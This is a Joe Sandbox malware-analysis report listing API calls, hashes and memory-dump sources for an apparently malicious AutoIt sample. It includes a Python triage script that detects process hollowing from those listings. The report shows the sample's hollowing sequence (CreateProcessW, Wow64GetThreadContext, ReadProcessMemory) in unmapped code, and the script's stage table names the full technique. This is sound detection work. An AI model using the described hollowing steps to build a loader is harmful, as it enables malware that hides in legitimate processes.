                                                • API ID: IconNotifyShell_
                                                • String ID:
                                                • API String ID: 1144537725-0
                                                • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                APIs
                                                • _malloc.LIBCMT ref: 0043214B
                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                • _malloc.LIBCMT ref: 0043215D
                                                • _malloc.LIBCMT ref: 0043216F
                                                Similarity
                                                • API ID: _malloc$AllocateHeap
                                                • String ID:
                                                • API String ID: 680241177-0
                                                • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                APIs
                                                • TranslateMessage.USER32(?), ref: 00409556
                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                Similarity
                                                • API ID: Message$DispatchPeekTranslate
                                                • String ID:
                                                • API String ID: 4217535847-0
                                                • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                APIs
                                                  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                • _free.LIBCMT ref: 004295A0
                                                  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                Similarity
                                                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                • API String ID: 3938964917-2806939583
                                                • Opcode ID: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                Strings
                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                Similarity
                                                • API ID: _strcat
                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                • API String ID: 1765576173-2684727018
                                                • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: f800691a6c58702cf5a996edc2c5780f63a8d9386b34bd2a46259168d6db88b9
                                                • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 004678F7
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorLast__wsplitpath_malloc
                                                • String ID:
                                                • API String ID: 4163294574-0
                                                • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 3d6c7d7a6ae677920793bf96237225282887b2b30ba90914ff16095f93448b68
                                                • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                                • Opcode Fuzzy Hash: 3d6c7d7a6ae677920793bf96237225282887b2b30ba90914ff16095f93448b68
                                                • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                                APIs
                                                  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                • _strcat.LIBCMT ref: 0040F786
                                                  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                • String ID:
                                                • API String ID: 3199840319-0
                                                • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                APIs
                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: FreeInfoLibraryParametersSystem
                                                • String ID:
                                                • API String ID: 3403648963-0
                                                • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                APIs
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                • __lock_file.LIBCMT ref: 00414A8D
                                                  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                • __fclose_nolock.LIBCMT ref: 00414A98
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                • String ID:
                                                • API String ID: 2800547568-0
                                                • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                APIs
                                                • __lock_file.LIBCMT ref: 00415012
                                                • __ftell_nolock.LIBCMT ref: 0041501F
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                • String ID:
                                                • API String ID: 2999321469-0
                                                • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 03EDDADD
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EDDB01
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EDDB23
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1698859580.0000000003EDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3edc000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                • Instruction ID: 900521c0946631972d536aba368e9e062a64e0c4af545e3b17f83e683eea3f25
                                                • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                • Instruction Fuzzy Hash: 9912CF24E14658C6EB24DF64D8507DEB232EF68300F10A1E9910DEB7A5E77A4F81CF5A
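The function above is the one worth a second look in this listing: it lives in a region the sandbox could not map to a PE image (Offset 03EDC000, "based on PE: false"), and it spawns a process, fetches the new thread's full 32-bit context (0x00010007 is CONTEXT_FULL for CONTEXT_i386) and then reads four bytes out of that process, which is the front half of a process-hollowing loader. The script below is an added triage example and is not part of the report or of Joe Sandbox's tooling: it parses API lines in the format the report prints ("Api.MODULE(args), ref: addr"), names the Win32 constants in the two CreateFileW calls listed earlier, and scores a function's API set against the hollowing stages. The stage table, the scoring and the "not PE-backed" bonus are this example's own choices, and the sample input is constructed by copying the call lines shown on this page.

```python
"""Triage helpers for per-function API listings in a Joe Sandbox report (added example)."""
import re
from dataclasses import dataclass, field

# One call per line; the comma before "ref:" is optional and CRT helpers such as
# "__wsplitpath.LIBCMT ref: 004678F7" carry no argument list. Subcall lines are
# prefixed with "Part of subcall function XXXXXXXX:".
API_LINE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list = field(default_factory=list)   # raw hex strings; "?" = unresolved
    ref: int = 0                                # call-site address

def parse_api_line(line: str):
    """Return an ApiCall for a report line, or None if the line is not a call."""
    m = API_LINE.match(line.strip())
    if not m:
        return None
    raw = (m["args"] or "").strip()
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))

def arg_int(a: str):
    """Hex argument -> int, or None when the sandbox printed '?' for it."""
    return None if a == "?" else int(a, 16)

# Win32 constants from the SDK headers, enough to read CreateFileW arguments.
GENERIC = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
           (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE = [(1, "FILE_SHARE_READ"), (2, "FILE_SHARE_WRITE"), (4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

def decode_create_file(call: ApiCall) -> dict:
    """Name the access, share and disposition constants of a CreateFileW call."""
    if not call.api.startswith("CreateFile") or len(call.args) < 5:
        raise ValueError("not a CreateFile call with enough arguments")
    access, share, disp = (arg_int(call.args[i]) for i in (1, 2, 4))
    return {
        "access": [n for bit, n in GENERIC if access is not None and access & bit],
        "share": [n for bit, n in SHARE if share is not None and share & bit],
        "disposition": DISPOSITION.get(disp, f"unknown({disp})"),
        "writes": access is not None and bool(access & 0x40000000),
    }

# Stages of classic process hollowing and the APIs that implement each one.
HOLLOWING_STAGES = [
    ("spawn",   {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"}),
    ("context", {"GetThreadContext", "Wow64GetThreadContext"}),
    ("read",    {"ReadProcessMemory", "NtReadVirtualMemory"}),
    ("unmap",   {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    ("write",   {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("setctx",  {"SetThreadContext", "Wow64SetThreadContext"}),
    ("resume",  {"ResumeThread", "NtResumeThread"}),
]

def hollowing_stages(calls):
    """Stages present in one function, ordered by the address of their first call site."""
    first = {}
    for stage, apis in HOLLOWING_STAGES:
        refs = [c.ref for c in calls if c.api in apis]
        if refs:
            first[stage] = min(refs)
    return sorted(first, key=first.get)

def hollowing_verdict(calls, pe_backed: bool) -> dict:
    """Flag a function that spawns a process first and then touches its thread
    context and memory. Code in a region not backed by a PE image (an unpacked
    stub, as at 03EDC000 here) adds to the score. Thresholds are this example's
    own; the 4-byte ReadProcessMemory is consistent with fetching the child's
    image base from its PEB, which is an interpretation, not something the
    report states."""
    stages = hollowing_stages(calls)
    core = {"spawn", "context"} <= set(stages) and ({"read", "write"} & set(stages))
    ordered = stages[:1] == ["spawn"]
    score = len(stages) + (2 if not pe_backed else 0)
    return {"stages": stages, "candidate": bool(core and ordered), "score": score}

# Constructed sample: the call lines of the 03EDC000 function and the two
# CreateFileW lines, copied from this report.
HOLLOWING_FUNC = [
    "• CreateProcessW.KERNELBASE(?,00000000), ref: 03EDDADD",
    "• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EDDB01",
    "• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EDDB23",
]
CREATEFILE_FUNC = [
    "• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A",
    "• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326",
]

if __name__ == "__main__":
    calls = [parse_api_line(l) for l in HOLLOWING_FUNC]
    print(hollowing_verdict(calls, pe_backed=False))
    for l in CREATEFILE_FUNC:
        print(decode_create_file(parse_api_line(l)))
```

Run against the three lines above the verdict reports the stages spawn, context and read in call-site order and marks the function a hollowing candidate; the CreateFileW decode shows the first call opening an existing file read-only with full sharing and the second opening-or-creating one for read and write, which is the pair you would expect from a loader that reads its payload and writes a dropped file. A match on the first three stages alone is a lead for the memory dumps at the end of the report, not a verdict; the unmap, write, set-context and resume stages would normally sit in a later function or be reached through a different thread.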
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                • Opcode Fuzzy Hash: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
